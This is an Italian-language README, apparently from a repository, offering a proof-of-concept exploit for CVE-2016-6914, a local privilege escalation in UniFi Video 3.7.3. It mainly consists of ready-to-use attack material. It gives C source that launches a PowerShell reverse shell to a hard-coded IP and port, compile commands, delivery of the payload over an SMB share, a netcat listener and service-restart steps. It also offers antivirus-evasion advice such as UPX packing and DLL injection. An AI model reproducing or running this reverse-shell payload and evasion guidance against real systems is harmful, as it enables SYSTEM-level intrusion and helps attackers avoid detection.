
CVE-2016-6914-UniFiVideo-LPE
Questo repository contiene una proof-of-concept (PoC) per CVE-2016-6914, una vulnerabilità di escalation dei privilegi locale (LPE) che riguarda Ubiquiti UniFi Video 3.7.3.
Un attaccante con privilegi limitati può sostituire un binario attendibile (taskkill.exe) all'interno di C:\ProgramData\unifi-video\ per eseguire codice dannoso con privilegi SYSTEM.
1️⃣ Sostituisci taskkill.exe con un payload dannoso (exploit.exe).
2️⃣ Attendi che UniFi Video Service venga eseguito o riavvialo manualmente.
3️⃣ Il payload dannoso viene eseguito, fornendo una shell SYSTEM.
Questo payload sostituisce taskkill.exe e avvia una reverse shell.
#include <windows.h>
int main() {
system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
return 0;
}
✅ Compila usando MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
---
🛠️ Istruzioni di utilizzo
1️⃣ Configura la condivisione SMB (per la consegna remota del file)
Su Kali, esegui:
impacket-smbserver share . -smb2support
2️⃣ Avvia il listener Netcat
nc -lvnp 4444
3️⃣ Consegna il payload alla macchina target
Esegui i seguenti comandi PowerShell sul sistema target:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ Ottieni la shell SYSTEM
Una volta eseguito, una shell SYSTEM si apre sul tuo listener!
🛡️ Bypass dell'Antivirus (AV)
Per eludere il rilevamento AV di base, prova: ✔️ Impacchetta l'eseguibile (UPX):
upx --best --lzma exploit.exe
✔️ Usa syscall alternative invece di system().
✔️ Incorpora in processi legittimi usando DLL Injection.
⚠️ Disclaimer
📢 Questa PoC è solo a scopo educativo!
🛑 L'uso non autorizzato è illegale e punibile.
👨💻 Usala solo in modo legale ed etico.
Riferimento:https://www.exploit-db.com/exploits/43390